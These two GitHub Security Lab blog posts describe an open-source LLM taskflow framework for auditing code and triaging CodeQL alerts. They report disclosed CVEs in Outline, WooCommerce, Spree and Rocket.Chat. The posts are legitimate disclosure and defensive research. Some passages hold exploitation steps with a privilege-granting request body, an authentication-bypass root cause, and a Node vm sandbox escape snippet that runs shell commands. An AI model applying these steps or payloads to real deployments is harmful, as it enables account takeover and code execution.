Man Yue Mo, Author at The GitHub Blog

How to scan for vulnerabilities with GitHub Security Lab’s open source AI-powered framework

Man Yue Mo — Fri, 06 Mar 2026 21:09:04 +0000

For the last few months, we’ve been using the GitHub Security Lab Taskflow Agent along with a new set of auditing taskflows that specialize in finding web security vulnerabilities. They also turn out to be very successful at finding high-impact vulnerabilities in open source projects.

As security researchers, we’re used to losing time on possible vulnerabilities that turn out to be unexploitable, but with these new taskflows, we can now spend more of our time on manually verifying the results and sending out reports. Furthermore, the severity of the vulnerabilities that we’re reporting is uniformly high. Many of them are authorization bypasses or information disclosure vulnerabilities that allow one user to login as somebody else or to access the private data of another user.

Using these taskflows, we’ve reported more than 80 vulnerabilities so far. At the time of writing, approximately 20 of them have already been disclosed. And we’re continually updating our advisories page when new vulnerabilities are disclosed. In this blog post, we’ll show a few concrete examples of high-impact vulnerabilities that are found by these taskflows, like accessing personally identifiable information (PII) in shopping carts of ecommerce applications or signing in with any password into a chat application.

We’ll also explain how the taskflows work, so you can learn how to write your own. The security community moves faster when it shares knowledge, which is why we’ve made the framework open source and easy to run on your own project. The more teams using and contributing to it, the faster we collectively eliminate vulnerabilities.

How to run the taskflows on your own project

Want to get started right away? The taskflows are open source and easy to run yourself! Please note: A GitHub Copilot license is required, and the prompts will use premium model requests. (Note that running the taskflows can result in many tool calls, which can easily consume a large amount of quota.)

Go to the seclab-taskflows repository and start a codespace.
Wait a few minutes for the codespace to initialize.
In the terminal, run ./scripts/audit/run_audit.sh myorg/myrepo

It might take an hour or two to finish on a medium-sized repository. When it finishes, it’ll open an SQLite viewer with the results. Open the “audit_results” table and look for rows with a check-mark in the “has_vulnerability” column.

Tip: Due to the non-deterministic nature of LLMs, it is worthwhile to perform multiple runs of these audit taskflows on the same codebase. In certain cases, a second run can lead to entirely different results. In addition to this, you might perform those two runs using different models (e.g., the first using GPT 5.2 and the second using Claude Opus 4.6).

The taskflows also work on private repos, but you’ll need to modify the codespace configuration to do so because it won’t allow access to your private repos by default.

Introduction to taskflows

Taskflows are YAML files that describe a series of tasks that we want to do with an LLM. With them, we can write prompts to complete different tasks and have tasks that depend on each other. The seclab-taskflow-agent framework takes care of running the tasks sequentially and passing the results from one task to the next.

For example, when auditing a repository, we first divide the repository into different components according to their functionalities. Then, for each component, we may want to collect some information such as entry points where it takes untrusted input from, intended privilege, and purposes of the component, etc. These results are then stored in a database to provide the context for subsequent tasks.

Based on the context data, we can then create different auditing tasks. Currently, we have a task that suggests some generic issues for each component and another task that carefully audits each suggested issue. However, it’s also possible to create other tasks, such as tasks with specific focus on a certain type of issue.

These become a list of tasks we specify in a taskflow file.

We use tasks instead of one big prompt because LLMs have limited context windows, and complex, multi-step tasks are often not completed properly. For example, some steps can be left out. Even though some LLMs have larger context windows, we find that taskflows are still useful in providing a way for us to control and debug the tasks, as well as for accomplishing bigger and more complex projects.

The seclab-taskflow-agent can also run the same task across many components asynchronously (like a for loop). During audits, we often reuse the same prompt and task for every component, varying only the details. The seclab-taskflow-agent lets us define templated prompts, iterate through components, and substitute component-specific details as it runs.

Taskflows for general security code audits

After using seclab-taskflow-agent to triage CodeQL alerts, we decided we didn’t want to restrict ourselves to specific types of vulnerabilities and started to explore using the framework for more general security auditing. The main challenge in giving LLMs more freedom is the possibility of hallucinations and an increase in false positives. After all, the success with triaging CodeQL alerts was partly due to the fact that we gave the LLM a very strict and well-defined set of instructions and criteria, so the results could be verified at each stage to see if the instructions were followed.

So our goal here was to find a good way to allow the LLM the freedom to look for different types of vulnerabilities while keeping hallucinations under control.

We’re going to show how we used agent taskflows to discover high-impact vulnerabilities with high true positive rate using just taskflow design and prompt engineering.

General taskflow design

To minimize hallucinations and false positives at the taskflow design level, our taskflow starts with a threat modelling stage, where a repository is divided into different components based on functionalities and various information, such as entry points, and the intended use of each component is collected. This information helps us to determine the security boundary of each component and how much exposure it has to untrusted input.

The information collected through the threat modelling stage is then used to determine the security boundary of each component and to decide what should be considered a security issue. For example, a command injection in a CLI tool with functionality designed to execute any user input script may be a bug but not a security vulnerability, as an attacker able to inject a command using the CLI tool can already execute any script.

At the level of prompts, the intended use and security boundary that is discovered is then used in the prompts to provide strict guidelines as to whether an issue found should be considered a vulnerability or not.

You need to take into account of the intention and threat model of the component in component notes to determine if an issue is a valid security issue or if it is an intended functionality. You can fetch entry points, web entry points and user actions to help you determine the intended usage of the component.

Asking an LLM something as vague as looking for any type of vulnerability anywhere in the code base would give poor results with many hallucinated issues. Ideally, we’d like to simulate the triage environment where we have some potential issues as the starting point of analysis and ask the LLM to apply rigorous criteria to determine whether the potential issue is valid or not.

To bootstrap this process, we break the auditing task into two steps.

First, we ask the LLM to go through each component of the repository and suggest types of vulnerabilities that are more likely to appear in the component.
These suggestions are then passed to another task, where they will be audited according to rigorous criteria.

In this setup, the suggestions from the first step act as some inaccurate vulnerability alerts flagged by an “external tool,” while the second step serves as a triage step. While this may look like a self-validating process—by breaking it down into two steps, each with a fresh context and different prompts—the second step is able to provide an accurate assessment of suggestions.

We’ll now go through these tasks in detail.

Threat modeling stage

When triaging alerts flagged by automatic code scanning tools, we found that a large proportion of false positives is the result of improper threat modeling. Most static analysis tools do not take into account the intended usage and security boundary of the source code and often give results that have no security implications. For example, in a reverse proxy application, many SSRF (server-side request forgery) vulnerabilities flagged by automated tools are likely to fall within the intended use of the application, while some web services used, for example, in continuous integration pipelines are designed to execute arbitrary code and scripts within a sandboxed environment. Remote code execution vulnerabilities in these applications without a sandboxed escape are generally not considered a security risk.

Given these caveats, it pays to first go through the source code to get an understanding of the functionalities and intended purpose of code. We divide this process into the following tasks:

Identify applications: A GitHub repository is an imperfect boundary for auditing: It may be a single component within a larger system or contain multiple components, so it’s worth identifying and auditing each component separately to match distinct security boundaries and keep scope manageable. We do this with the identify_applications taskflow, which asks the LLM to inspect the repository’s source code and documentation and divide it into components by functionality.
Identify entry points: We identify how each entry point is exposed to untrusted inputs to better gauge risk and anticipate likely vulnerabilities. Because “untrusted input” varies significantly between libraries and applications, we provide separate guidelines for each case.
Identify web entry points: This is an extra step to gather further information about entry points in the application and append information that is specific to web application entry points such as noting the HTTP method and paths that are required to access a certain endpoint.
Identify user actions: We have the LLM review the code and identify what functionality a user can access under normal operation. This clarifies the user’s baseline privileges, helps assess whether vulnerabilities could enable privilege gains, and informs the component’s security boundary and threat model, with separate instructions depending on whether the component is a library or an application.

At each of the above steps, information gathered about the repository is stored in a database. This includes components in the repository, their entry points, web entry points, and intended usage. This information is then available for use in the next stage.

Issue suggestion stage

At this stage, we instruct the LLM to suggest some types of vulnerabilities, or a general area of high security risk for each component based on the information about the entry point and intended use of the component gathered from the previous step. In particular, we put emphasis on the intended usage of the component and its risk from untrusted input:

Base your decision on:
- Is this component likely to take untrusted user input? For example, remote web request or IPC, RPC calls?
- What is the intended purpose of this component and its functionality? Does it allow high privileged action?
Is it intended to provide such functionalities for all user? Or is there complex access control logic involved?
- The component itself may also have its own `README.md` (or a subdirectory of it may have a `README.md`). Take a look at those files to help understand the functionality of the component.

We also explicitly instruct the LLM to not suggest issues that are of low severity or are generally considered non-security issues.

However, you should still take care not to include issues that are of low severity or requires unrealistic attack scenario such as misconfiguration or an already compromised system.

In general, we keep this stage relatively free of restrictions and allow the LLM freedom to explore and suggest different types of vulnerabilities and potential security issues. The idea is to have a reasonable set of focus areas and vulnerability types for the actual auditing task to use as a starting point.

One problem we ran into was that the LLM would sometimes start auditing the issues that it suggested, which would defeat the purpose of the brainstorming phase. To prevent this, we instructed the LLM to not audit the issues.

Issue audit stage

This is the final stage of the taskflows. Once we’ve gathered all the information we need about the repository and have suggested some types of vulnerabilities and security risks to focus on, the taskflow goes through each suggested issue and audits them by going through the source code. At this stage, the task starts with fresh context to scrutinize the issues suggested from the previous stage. The suggestions are considered to be unvalidated, and this taskflow is instructed to verify these issues:

The issues suggested have not been properly verified and are only suggested because they are common issues in these types of application. Your task is to audit the source code to check if this type of issues is present.

To avoid the LLM coming up with issues that are non-security related in the context of the component, we once again emphasize that intended usage must be taken into consideration.

You need to take into account of the intention and threat model of the component in component notes to determine if an issue is a valid security issue or if it is an intended functionality.

To avoid the LLM hallucinating issues that are unrealistic, we also instruct it to provide a concrete and realistic attack scenario and to only consider issues that stem from errors in the source code:

Do not consider scenarios where authentication is bypassed via stolen credential etc. We only consider situations that are achievable from within the source code itself.
...
If you believe there is a vulnerability, then you must include a realistic attack scenario, with details of all the file and line included, and also what an attacker can gain by exploiting the vulnerability. Only consider the issue a vulnerability if an attacker can gain privilege by performing an action that is not intended by the component.

To further reduce hallucinations, we also instruct the LLM to provide concrete evidence from the source code, with file path and line information:

Keep a record of the audit notes, be sure to include all relevant file path and line number. Just stating an end point, e.g. `IDOR in user update/delete endpoints (PUT /user/:id)` is not sufficient. I need to have the file and line number.

Finally, we also instruct the LLM that it is possible that there is no vulnerability in the component and that it should not make things up:

Remember, the issues suggested are only speculation and there may not be a vulnerability at all and it is ok to conclude that there is no security issue.

The emphasis of this stage is to provide accurate results while following strict guidelines—and to provide concrete evidence of the findings. With all these strict instructions in place, the LLM indeed rejects many unrealistic and unexploitable suggestions with very few hallucinations.

The first prototype was designed with hallucination prevention as a priority, which raised a question: Would it become too conservative, rejecting most vulnerability candidates and failing to surface real issues?

The answer is clear after we ran the taskflow on a few repositories.

Three examples of vulnerabilities found by the taskflows

In this section, we’ll show three examples of vulnerabilities that were found by the taskflows and that have already been disclosed. In total, we have found and reported over 80 vulnerabilities so far. We publish all disclosed vulnerabilities on our advisories page.

Privilege escalation in Outline (CVE-2025-64487)

Our information-gathering taskflows are optimized toward web applications, which is why we first pointed our audit taskflows to a collaborative web application called Outline.

Outline is a multi-user collaboration suite with properties we were especially interested in:

Documents have owners and different visibility, with permissions per users and teams.
Access rules like that are hard to analyze with a Static Application Security Testing (SAST) tool, since they use custom access mechanisms and existing SAST tools typically don’t know what actions a normal “user” should be able to perform.
Such permission schemes are often also hard to analyze for humans by only reading the source code (if you didn’t create the scheme yourself, that is).

And success: Our taskflows found a bug in the authorization logic on the very first run!

The notes in the audit results read like this:

Audit target: Improper membership management authorization in component server (backend API) of outline/outline (component id 2).

Summary conclusion: A real privilege escalation vulnerability exists. The document group membership modification endpoints (documents.add_group, documents.remove_group) authorize with the weaker \"update\" permission instead of the stronger \"manageUsers\" permission that is required for user membership changes. Because \"update\" can be satisfied by having only a ReadWrite membership on the document, a non‑admin document collaborator can grant (or revoke) group memberships – including granting Admin permission – thereby escalating their own privileges (if they are in the added group) and those of other group members. This allows actions (manageUsers, archive, delete, etc.) that were not intended for a mere ReadWrite collaborator.

Reading the TypeScript-based source code and verifying this finding on a test instance revealed that it was exploitable exactly as described. In addition, the described steps to exploit this vulnerability were on point:

Prerequisites:
- Attacker is a normal team member (not admin), not a guest, with direct ReadWrite membership on Document D (or via a group that grants ReadWrite) but NOT Admin.
- Attacker is a member of an existing group G in the same team (they do not need to be an admin of G; group read access is sufficient per group policy).

Steps:
1. Attacker calls POST documents.add_group (server/routes/api/documents/documents.ts lines 1875-1926) with body:
   {
     "id": "",
     "groupId": "",
     "permission": "admin"
   }
2. Authorization path:
   - Line 1896: authorize(user, "update", document) succeeds because attacker has ReadWrite membership (document.ts lines 96-99 allow update).
   - Line 1897: authorize(user, "read", group) succeeds for any non-guest same-team user (group.ts lines 27-33).
   No \"manageUsers\" check occurs.
3. Code creates or updates GroupMembership with permission Admin (lines 1899-1919).
4. Because attacker is a member of group G, their effective document permission (via groupMembership) now includes DocumentPermission.Admin.
5. With Admin membership, attacker now satisfies includesMembership(Admin) used in:
   - manageUsers (document.ts lines 123-134) enabling adding/removing arbitrary users via documents.add_user / documents.remove_user (lines 1747-1827, 1830-1872).
   - archive/unarchive/delete (document.ts archive policy lines 241-252; delete lines 198-208) enabling content integrity impact.
   - duplicate, move, other admin-like abilities (e.g., duplicate policy lines 136-153; move lines 155-170) beyond original ReadWrite scope.

Using these instructions, a low-privileged user could add arbitrary groups to a document that the user was only allowed to update (the user not being in the possession of the “manageUsers” permission that was typically required for such changes).

In this sample, the group “Support” was added to the document by the low-privileged user named “gg.”

The Outline project fixed this and another issue we reported within three days! (Repo advisory)

The shopping cartocalypse (CVE-2025-15033, CVE-2026-25758)

We didn’t realize what systematic issues we’d uncover in the cart logic of ecommerce applications until we pointed our taskflows at the first online shop in our list. In the PHP-based WooCommerce project, the taskflows promptly found a way for normally signed-in shop users to view all guest orders—including personally identifiable information (including names, addresses, and phone numbers). After we reported this, Automattic (the company behind WooCommerce) quickly released an update (CVE-2025-15033) and accompanying blog post.

Intrigued by that vulnerability, we’ve added additional ecommerce applications to our list of applications to be audited by our agent. And sure enough, we found more vulnerabilities. The popular Ruby-based Spree commerce application contained two similar vulnerabilities (CVE-2026-25758 and CVE-2026-25757). The more critical one allowed unauthenticated users to simply enumerate the addresses (and phone numbers) of all guest orders by more or less incrementing a sequential number.

In this screenshot, the attacker “test66” linked their session to an existing address of a guest user, thus being able to view the full address and phone number.

Our bug-hunting spree didn’t stop with Spree. Our taskflows uncovered similar issues in two additional ecommerce applications.

These authorization logic bugs had been undiscovered for years.

Signing in to Rocket.Chat using any password (CVE-2026-28514)

(This is not what passwordless authentication should look like!)

Every so often you can’t believe your eyes. This finding reported by our taskflows in Rocket.Chat was one of those moments.

When your agent comes back with a note like this:

VULNERABILITY: password authentication bypass in account-service allows logging in as any user with a password set.

You might find it hard to believe at first.

When you then continue reading the output:

Root cause:
- ee/apps/account-service/src/lib/utils.ts:60-61: `validatePassword` returns `Promise` (bcrypt.compare(...)).
- ee/apps/account-service/src/lib/loginViaUsername.ts:18-21: `const valid = user.services?.password?.bcrypt && validatePassword(password, user.services.password.bcrypt);` but does NOT `await` the Promise; since a Promise is truthy, `if (!valid) return false;` is never triggered when bcrypt hash exists.
- ee/apps/account-service/src/lib/loginViaUsername.ts:23-35: proceeds to mint a new login token and saves it, returning `{ uid, token, hashedToken, tokenExpires }`.

It might make more sense, but you’re still not convinced.

It turns out the suspected finding is in the micro-services based setup of Rocket.Chat. In that particular setup, Rocket.Chat exposes its user account service via its DDP Streamer service.

Rocket.Chat’s microservices deployment Copyright Rocket.Chat. (This architecture diagram is from Rocket.Chat’s documentation.)

Once our Rocket.Chat test setup was working properly, we had to write proof of concept code to exploit this potential vulnerability. The notes of the agent already contained the JSON construct that we could use to connect to the endpoint using Meteor’s DDP protocol.

We connected to the WebSocket endpoint for the DDP streamer service, and yes: It was truly possible to login into the exposed Rocket.Chat DDP service using any password. Once signed in, it was also possible to perform other operations such as connecting to arbitrary chat channels and listening on them for messages sent to those channels.

Here we received the message “HELLO WORLD!!!” while listening on the “General” channel.

The technical details of this issue are interesting (and scary as well). Rocket.Chat, primarily a TypeScript-based web application, uses bcrypt to store local user passwords. The bcrypt.compare function (used to compare a password against its stored hash) returns a Promise—a fact that is reflected in Rocket.Chat’s own validatePassword function, which returns Promise:

export const validatePassword = (password: string, bcryptPassword: string): Promise =>
    bcrypt.compare(getPassword(password), bcryptPassword);

However, when that function was used, the value of the Promise was not settled (e.g. by adding an await keyword in front of validatePassword):

const valid = user.services?.password?.bcrypt && validatePassword(password, user.services.password.bcrypt);

if (!valid) {
    return false;
}

This led to the result of validatePassword being ANDed with true. Since a returned Promise is always “truthy” speaking in JavaScript terms, the boolean valid subsequently was always true when a user had a bcrypt password set.

Severity aside, it’s fascinating that the LLM was able to pick up this rather subtle bug, follow it through multiple files, and arrive at the correct conclusion.

What we learned

After running the taskflows over 40 repositories—mostly multi-user web applications—the LLM suggested 1,003 issues (potential vulnerabilities).

After the audit stage, 139 were marked as having vulnerabilities, meaning that the LLM decided they were exploitable After deduplicating the issues—duplicates happen because each repository is run a couple of times on average and the results are aggregated—we end up with 91 vulnerabilities, which we decided to manually inspect before reporting.

We rejected 20 (22%) results as FP: False Positives that we couldn’t reproduce manually.
We rejected 52 (57%) results as low severity: Issues that have very limited potential impact (e.g., blind SSRF with only a HTTP status code returned, issues that require malicious admin during installation stage, etc.).
We kept only 19 (21%) results that we considered vulnerabilities impactful enough to report, all serious vulnerabilities with the majority having a high or critical severity (e.g., vulnerabilities that can be triggered without specific requirements with impact to confidentiality or integrity, such as disclosure of personal data, overwriting of system settings, account takeover, etc.).

This data was collected using gpt-5.x as the model for code analysis and audit tasks.

Note that we have run the taskflows on more repositories since this data was collected, so this table does not represent all the data we’ve collected and all vulnerabilities we’ve reported.

Issue category	All	Has vulnerability	Vulnerability rate
IDOR/Access control issue	241	38	15.8%
XSS	131	17	13.0%
CSRF	110	17	15.5%
Authentication issue	91	15	16.5%
Security misconfiguration	75	13	17.3%
Path traversal	61	10	16.4%
SSRF	45	7	15.6%
Command injection	39	5	12.8%
Remote code execution	24	1	4.2%
Business logic issue	24	6	25.0%
Template injection	24	1	4.2%
File upload handling issues (excludes path traversal)	18	2	11.1%
Insecure deserialization	17	0	0.0%
Open redirect	16	0	0.0%
SQL injection	9	0	0.0%
Sensitive data exposure	8	0	0.0%
XXE	4	0	0.0%
Memory safety	3	0	0.0%
Others	66	7	10.6%

If we divide the findings into two rough categories—logical issues (IDOR, authentication, security misconfiguration, business logic issues, sensitive data exposure) and technical issues (XSS, CSRF, path traversal, SSRF, command injection, remote code execution, template injection, file upload issues, insecure deserialization, open redirect, SQL injection, XXE, memory safety)—we get 439 logical issues and 501 technical issues. Although more technical issues were suggested, the difference isn’t significant because some broad categories (such as remote code execution and file upload issues) can also involve logical issues depending on the attacker scenario.

There are only three suggested issues that concern memory safety. This isn’t too surprising, given the majority of the repositories tested are written in memory-safe languages. But we also suspect that the current taskflows may not be very efficient in finding memory-safety issues, especially when comparing to other automated tools such as fuzzers. This is an interesting area that can be improved by creating more specific taskflows and making more tools, like fuzzers, available to the LLM.

This data led us to the following observations.

LLMs are particularly good at finding logic bugs

What stands out from the data is the 25% rate of “Business logic issue” and the large amount of IDOR issues. In fact, the total number of IDOR issues flagged as vulnerable is more than the next two categories combined (XSS and CSRF). Overall, we get the impression that the LLM does an excellent job of understanding the code space and following the control flow, while taking into account the access control model and intended usage of the application, which is more or less what we’d expect from LLMs that excel in tasks like code reviews. This also makes it great for finding logic bugs that are difficult to find with traditional tools.

LLMs are good at rejecting low-severity issues and false positives

Curiously, none of the false positives are what we’d consider to be hallucinations. All the reports, including the false positives, have sound evidence backing them up, and we were able to follow through the report to locate the endpoints and apply the suggested payload. Many of the false positives are due to more complex circumstances beyond what is available in the code, such as browser mitigations for XSS issues mentioned above or what we would consider as genuine mistakes that a human auditor is also likely to make. For example, when multiple layers of authentications are in place, the LLM could sometimes miss out some of the checks, resulting in false positives.

We have since tested more repositories with more vulnerabilities reported, but the ratio between vulnerabilities and repositories remains roughly the same.

To demonstrate the extensibility of taskflows and how extra information can be incorporated into the taskflows, we created a new taskflow to run after the audit stage, which incorporates our new-found knowledge to filter out low-severity vulnerabilities. We found that the taskflow can filter out roughly 50% of the low-severity vulnerabilities with a couple of borderline vulnerabilities that we reported also getting marked as low severity. The taskflow and the prompt can be adjusted to fit the user’s own preference, but for us, we’re happy to make it more inclusive so we don’t miss out on anything impactful.

LLMs are good at threat modeling

The LLM performs well in threat modeling in general. During the experiment, we tested it on a number of applications with different threat models, such as desktop applications, multi-tenant web applications, applications that are designed to run code in sandbox environments (code injection by design), and reverse proxy applications (applications where SSRF-like behavior is intended). The taskflow is able to take into account the intended usage of these applications and make sound decisions. The taskflow struggles most with threat modelling of desktop applications, as it is often unclear whether other processes running on the user’s desktop should be considered trusted or not.

We’ve also observed some remarkable reasoning by the LLM that excludes issues with no privilege gains. For example, in one case, the LLM noticed that while there are inconsistencies in access control, the issue does not give the attacker any advantages over a manual copy and paste action:

Security impact assessment:

A user possessing only read access to a document (no update rights) can duplicate it provided they also have updateDocument rights on the destination collection. This allows creation of a new editable copy of content they could already read. This does NOT grant additional access to other documents nor bypass protections on the original; any user with read access could manually copy-paste the content into a new document they are permitted to create (creation generally allowed for non-guest, non-viewer members in ReadWrite collections per createDocument collection policy)

We’ve also seen some more sophisticated techniques that were used in the reasoning. For example, in one application that is running scripts in a sandboxed nodejs environment, the LLM suggested the following technique to escape the sandbox:

In Node’s vm, passing any outer-realm function into a contextified sandbox leaks that function’s outer-realm Function constructor through the `constructor` property. From inside the sandbox:
  const F = console.log.constructor; // outer-realm Function
  const hostProcess = F('return process')(); // host process object
  // Bypass module allowlist via host dynamic import
  const cp = await F('return import("node:child_process")')();
  const out = cp.execSync('id').toString();
  return [{ json: { out } }];

The presence of host functions (console.log, timers, require, RPC methods) is sufficient to obtain the host Function constructor and escape the sandbox. The allowlist in require-resolver is bypassed by constructing host-realm functions and using dynamic import of built-in modules (e.g., node:child_process), which does not go through the sandbox’s custom require.

While the result turns out to be a false positive due to other mitigating factors, it demonstrates the LLM’s technical knowledge.

Get involved!

The taskflows we used to find these vulnerabilities are open source and easy to run on your own project, so we hope you’ll give them a try! We also want to encourage you to write your own taskflows. The results showcased in this blog post are just small examples of what’s possible. There are other types of vulnerabilities to find, and there are other security-related problems, like triaging SAST results or building development setups, which we think taskflows can help with. Let us know what you’re building by starting a discussion on our repo!

The post How to scan for vulnerabilities with GitHub Security Lab’s open source AI-powered framework appeared first on The GitHub Blog.

AI-supported vulnerability triage with the GitHub Security Lab Taskflow Agent

Man Yue Mo — Tue, 20 Jan 2026 19:52:50 +0000

Triaging security alerts is often very repetitive because false positives are caused by patterns that are obvious to a human auditor but difficult to encode as a formal code pattern. But large language models (LLMs) excel at matching the fuzzy patterns that traditional tools struggle with, so we at the GitHub Security Lab have been experimenting with using them to triage alerts. We are using our recently announced GitHub Security Lab Taskflow Agent AI framework to do this and are finding it to be very effective.

💡 Learn more about it and see how to activate the agent in our previous blog post.

In this blog post, we’ll introduce these triage taskflows, showcase results, and share tips on how you can develop your own—for triage or other security research workflows.

By using the taskflows described in this post, we quickly triaged a large number of code scanning alerts and discovered many (~30) real-world vulnerabilities since August, many of which have already been fixed and published. When triaging the alerts, the LLMs were only given tools to perform basic file fetching and searching. We have not used any static or dynamic code analysis tools other than to generate alerts from CodeQL.

While this blog post showcases how we used LLM taskflows to triage CodeQL queries, the general process creates automation using LLMs and taskflows. Your process will be a good candidate for this if:

You have a task that involves many repetitive steps, and each one has a clear and well-defined goal.
Some of those steps involve looking for logic or semantics in code that are not easy for conventional programming to identify, but are fairly easy for a human auditor to identify. Trying to identify them often results in many monkey patching heuristics, badly written regexp, etc. (These are potential sweet spots for LLM automation!)

If your project meets those criteria, then you can create taskflows to automate these sweet spots using LLMs, and use MCP servers to perform tasks that are well suited for conventional programming.

Both the seclab-taskflow-agent and seclab-taskflows repos are open source, allowing anyone to develop LLM taskflows to perform similar tasks. At the end of this blog post, we’ll also give some development tips that we’ve found useful.

Introduction to taskflows

Taskflows are YAML files that describe a series of tasks that we want to do with an LLM. In this way, we can write prompts to complete different tasks and have tasks that depend on each other. The seclab-taskflow-agent framework takes care of running the tasks one after another and passing the results from one task to the next.

For example, when auditing CodeQL alert results, we first want to fetch the code scanning results. Then, for each result, we may have a list of tasks that we need to check. For example, we may want to check if an alert can be reached by an untrusted attacker and whether there are authentication checks in place. These become a list of tasks we specify in a taskflow file.

We use tasks instead of one big prompt because LLMs have limited context windows, and complex, multi-step tasks often are not completed properly. Some steps are frequently left out, so having a taskflow to organize the task avoids these problems. Even with LLMs that have larger context windows, we find that taskflows are useful to provide a way for us to control and debug the task, as well as to accomplish bigger and more complex tasks.

The seclab-taskflow-agent can also perform a batch “for loop”-style task asynchronously. When we audit alerts, we often want to apply the same prompts and tasks to every alert, but with different alert details. The seclab-taskflow-agent allows us to create templated prompts to iterate through the alerts and replace the details specific to each alert when running the task.

Triaging taskflows from a code scanning alert to a report

The GitHub Security Lab periodically runs a set of CodeQL queries against a selected set of open source repositories. The process of triaging these alerts is usually fairly repetitive, and for some alerts, the causes of false positives are usually fairly similar and can be spotted easily.

For example, when triaging alerts for GitHub Actions, false positives often result from some checks that have been put in place to make sure that only repo maintainers can trigger a vulnerable workflow, or that the vulnerable workflow is disabled in the configuration. These access control checks come in many different forms without an easily identifiable code pattern to match and are thus very difficult for a static analyzer like CodeQL to detect. However, a human auditor with general knowledge of code semantics can often identify them easily, so we expect an LLM to be able to identify these access control checks and remove false positives.

Over the course of a couple of months, we’ve tested our taskflows with a few CodeQL rules using mostly Claude Sonnet 3.5. We have identified a number of real, exploitable vulnerabilities. The taskflows do not perform an “end-to-end” analysis, but rather produce a bug report with all the details and conclusions so that we can quickly verify the results. We did not instruct the LLM to validate the results by creating an exploit nor provide any runtime environment for it to test its conclusion. The results, however, remain fairly accurate even without an automated validation step and we were able to remove false positives in the CodeQL queries quickly.

The rules are chosen based on our own experience of triaging these types of alerts and whether the list of tasks can be formulated into clearly defined instructions for LLMs to consume.

General taskflow design

Taskflows generally consist of tasks that are divided into a few different stages. In the first stage, the tasks collect various bits of information relevant to the alert. This information is then passed to an auditing stage, where the LLM looks for common causes of false positives from our own experience of triaging alerts. After the auditing stage, a bug report is generated using the information gathered. In the actual taskflows, the information gathering and audit stage are sometimes combined into a single task, or they may be separate tasks, depending on how complex the task is.

To ensure that the generated report has sufficient information for a human auditor to make a decision, an extra step checks that the report has the correct formatting and contains the correct information. After that, a GitHub Issue is created, ready to be reviewed.

Creating a GitHub Issue not only makes it easy for us to review the results, but also provides a way to extend the analysis. After reviewing and checking the issues, we often find that there are causes for false positives that we missed during the auditing process. Also, if the agent determines that the alert is valid, but the human reviewer disagrees and finds that it’s a false positive for a reason that was unknown to the agent so far, the human reviewer can document this as an alert dismissal reason or issue comment. When the agent analyzes similar cases in the future, it will be aware of all the past analysis stored in those issues and alert dismissal reasons, incorporate this new intelligence in its knowledge base, and be more effective at detecting false positives.

Information collection

During this stage, we instruct the LLM (examples are provided in the Triage examples section below) to collect relevant information about the alert, which takes into account the threat model and human knowledge of the alert in general. For example, in the case of GitHub Actions alerts, it will look at what permissions are set in the GitHub workflow file, what are the events that trigger the GitHub workflow, whether the workflow is disabled, etc. These generally involve independent tasks that follow simple, well-defined instructions to ensure the information collected is consistent. For example, checking whether a GitHub workflow is disabled involves making a GitHub API call via an MCP server.

To ensure that the information collected is accurate and to reduce hallucination, we instruct the LLM to include precise references to the source code that includes both file and line number to back up the information it collected:

You should include the line number where the untrusted code is invoked, as well as the untrusted code or package manager that is invoked in the notes.

Each task then stores the information it collected in audit notes, which are kind of a running commentary of an alert. Once the task is completed, the notes are serialized to a database which the next task can then append their notes to when it is done.

In general, each of the information gathering tasks is independent of each other and does not need to read each other’s notes. This helps each task to focus on its own scope without being distracted by previously collected information.

The end result is a “bag of information” in the form of notes associated with an alert that is then passed to the auditing tasks.

Audit issue

At this stage, the LLM goes through the information gathered and performs a list of specific checks to reject alert results that turned out to be false positives. For example, when triaging a GitHub Actions alert, we may have collected information about the events that trigger the vulnerable workflow. In the audit stage, we’ll check if these events can be triggered by an attacker or if they run in a privileged context. After this stage, a lot of the false positives that are obvious to a human auditor will be removed.

Decision-making and report generation

For alerts that have made it through the auditing stage, the next step is to create a bug report using the information gathered, as well as the reasoning for the decision at the audit stage. Again, in our prompt, we are being very precise about the format of the report and what information we need. In particular, we want it to be concise but also include information that makes it easy for us to verify the results, with precise code references and code blocks.

The report generated uses the information gathered from the notes in previous stages and only looks at the source code to fetch code snippets that are needed in the report. No further analysis is done at this stage. Again, the very strict and precise nature of the tasks reduces the amount of hallucination.

Report validation and issue creation

After the report is written, we instruct the LLM to check the report to ensure that all the relevant information is contained in the report, as well as the consistency of the information:

Check that the report contains all the necessary information:
- This criteria only applies if the workflow containing the alert is a reusable action AND has no high privileged trigger. 
You should check it with the relevant tools in the gh_actions toolbox.
If that's not the case, ignore this criteria.
In this case, check that the report contains a section that lists the vulnerable action users. 
If there isn't any vulnerable action users and there is no high privileged trigger, then mark the alert as invalid and using the alert_id and repo, then remove the memcache entry with the key {{ RESULT_key }}.

Missing or inconsistent information often indicates hallucinations or other causes of false positives (for example, not being able to track down an attacker controlled input). In either case, we dismiss the report.

If the report contains all the information and is consistent, then we open a GitHub Issue to track the alert.

Issue review and repo-specific knowledge

The GitHub Issue created in the previous step contains all the information needed to verify the issue, with code snippets and references to lines and files. This provides a kind of “checkpoint” and a summary of the information that we have, so that we can easily extend the analysis.

In fact, after creating the issue, we often find that there are repo-specific permission checks or sanitizers that render the issue a false positive. We are able to incorporate these problems by creating taskflows that review these issues with repo-specific knowledge added in the prompts. One approach that we’ve experimented with is to collect dismissal reasons for alerts in a repo and instruct the LLM to take into account these dismissal reasons and review the GitHub issue. This allows us to remove false positives due to reasons specific to a repo.

In this case, the LLM is able to identify the alert as false positive after taking into account a custom check-run permission check that was recorded in the alert dismissal reasons.

Triage examples and results

In this section we’ll give some examples of what these taskflows look like in practice. In particular, we’ll show taskflows for triaging some GitHub actions and JavaScript alerts.

GitHub Actions alerts

The specific actions alerts that we triaged are checkout of untrusted code in a privileged context and code injection.

The triaging of these queries shares a lot of similarities. For example, both involve checking the workflow triggering events, permissions of the vulnerable workflow, and tracking workflow callers. In fact, the main differences involve local analysis of specific details of the vulnerabilities. For code injection, this involves whether the injected code has been sanitized, how the expression is evaluated and whether the input is truly arbitrary (for example, pull request ID is unlikely to cause code injection issue). For untrusted checkout, this involves whether there is a valid code execution point after the checkout.

Since many elements in these taskflows are the same, we’ll use the code injection triage taskflow as an example. Note that because these taskflows have a lot in common, we made heavy use of reusable features in the seclab-taskflow-agent, such as prompts and reusable tasks.

When manually triaging GitHub Actions alerts for these rules, we commonly run into false positives because of:

Vulnerable workflow doesn’t run in a privileged context. This is determined by the events that trigger the vulnerable workflow. For example, a workflow triggered by the pull_request_target runs in a privileged context, while a workflow triggered by the pull_request event does not. This can usually be determined by simply looking at the workflow file.
